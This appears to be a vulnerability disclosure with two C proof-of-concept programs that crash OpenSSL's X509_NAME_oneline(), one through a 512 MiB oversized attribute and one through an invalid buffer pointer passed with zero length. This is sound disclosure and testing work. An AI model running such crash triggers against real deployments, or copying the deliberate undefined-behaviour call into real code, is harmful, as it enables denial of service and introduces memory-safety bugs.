OpenSSL X509_NAME_oneline memory corruption issues

Memory corruption due to oversized input. The program below builds a 512 MiB attribute consisting entirely of the non-printable byte 0x01, adds it to a fresh certificate's subject name, and then lets X509_NAME_oneline() allocate its own output buffer (buf = NULL, len = 0). Because X509_NAME_oneline() escapes non-printable bytes in its one-line form, the output is several times larger than the input, which is what the oversized input is designed to stress.

#include <stdlib.h>
#include <string.h>

#include <openssl/x509.h>

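int main(void)
{
    /*
     * PoC: oversized subject-name attribute fed to X509_NAME_oneline().
     *
     * Build a 512 MiB attribute consisting entirely of the non-printable byte
     * 0x01, attach it to a fresh certificate's subject name, then call
     * X509_NAME_oneline() with buf == NULL / len == 0 so that the library
     * allocates and sizes the output buffer itself.  Non-printable bytes are
     * escaped in the one-line form, so the output is several times larger
     * than the input.  NOTE(review): the corruption is presumably in the
     * library's output-length arithmetic; confirm against the OpenSSL version
     * under test.
     *
     * Returns 0 if the run completes, 1 on setup failure.  A crash is the
     * expected outcome on an affected build.
     */
    const size_t stringsize = 536870912; /* 2^29 bytes */

    unsigned char *str = malloc(stringsize + 1); /* +1 for the terminator */
    if (!str) {
        return 1;
    }
    memset(str, 0x01, stringsize);
    str[stringsize] = 0x00; /* len == -1 below makes OpenSSL strlen() this */

    X509 *x509 = X509_new();
    if (!x509) {
        free(str);
        return 1;
    }
    X509_NAME *name = X509_get_subject_name(x509);

    /*
     * Abort if the entry could not be added: X509_NAME_oneline() would then
     * run on an empty name and the PoC would silently prove nothing.
     */
    if (!X509_NAME_add_entry_by_txt(name, "friendlyName", MBSTRING_ASC,
                                    str, -1, -1, 0)) {
        X509_free(x509);
        free(str);
        return 1;
    }

    /*
     * The call under test.  If it returns, the result is a library-allocated
     * buffer owned by the caller and released with OPENSSL_free().
     */
    char *oneline = X509_NAME_oneline(name, NULL, 0);
    OPENSSL_free(oneline);

    X509_free(x509);
    free(str);
    return 0;
}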

Proof that X509_NAME_oneline() writes to the caller-supplied buffer even though the len parameter is 0. The program below deliberately passes an invalid buffer pointer, (char *)1: an implementation that honours len == 0 never touches the buffer and exits normally, whereas one that ignores it dereferences the bogus pointer and crashes.

#include <stdlib.h>
#include <string.h>

#include <openssl/x509.h>

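int main(void)
{
    /*
     * PoC: X509_NAME_oneline() writes through a caller-supplied buffer even
     * when the supplied length is 0.
     *
     * A 1 KiB printable attribute is attached to a fresh subject name and
     * X509_NAME_oneline() is called with len == 0 and a deliberately invalid
     * buffer pointer, (char *)1.  An implementation that honours len == 0 has
     * nothing to write and returns without touching the buffer; one that
     * ignores len dereferences the bogus pointer and crashes.
     *
     * NOTE(review): the bogus-pointer call is undefined behaviour by design
     * and exists only as a crash oracle -- never copy it into real code.
     *
     * Returns 0 if the run completes, 1 on setup failure.
     */
    const size_t stringsize = 1024;

    unsigned char *str = malloc(stringsize + 1); /* +1 for the terminator */
    if (!str) {
        return 1;
    }
    memset(str, 'x', stringsize);
    str[stringsize] = 0x00; /* len == -1 below makes OpenSSL strlen() this */

    X509 *x509 = X509_new();
    if (!x509) {
        free(str);
        return 1;
    }
    X509_NAME *name = X509_get_subject_name(x509);

    /* Abort if the entry could not be added, so the name under test is never empty. */
    if (!X509_NAME_add_entry_by_txt(name, "friendlyName", MBSTRING_ASC,
                                    str, -1, -1, 0)) {
        X509_free(x509);
        free(str);
        return 1;
    }

    /*
     * The call under test: a non-NULL (but invalid) buffer with length 0.
     * Per the OpenSSL documentation a supplied buffer is returned rather than
     * a fresh allocation, so the return value is ignored and nothing is freed.
     */
    X509_NAME_oneline(name, (char *)1, 0);

    /* Reached only when X509_NAME_oneline() respected len == 0. */
    X509_free(x509);
    free(str);
    return 0;
}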
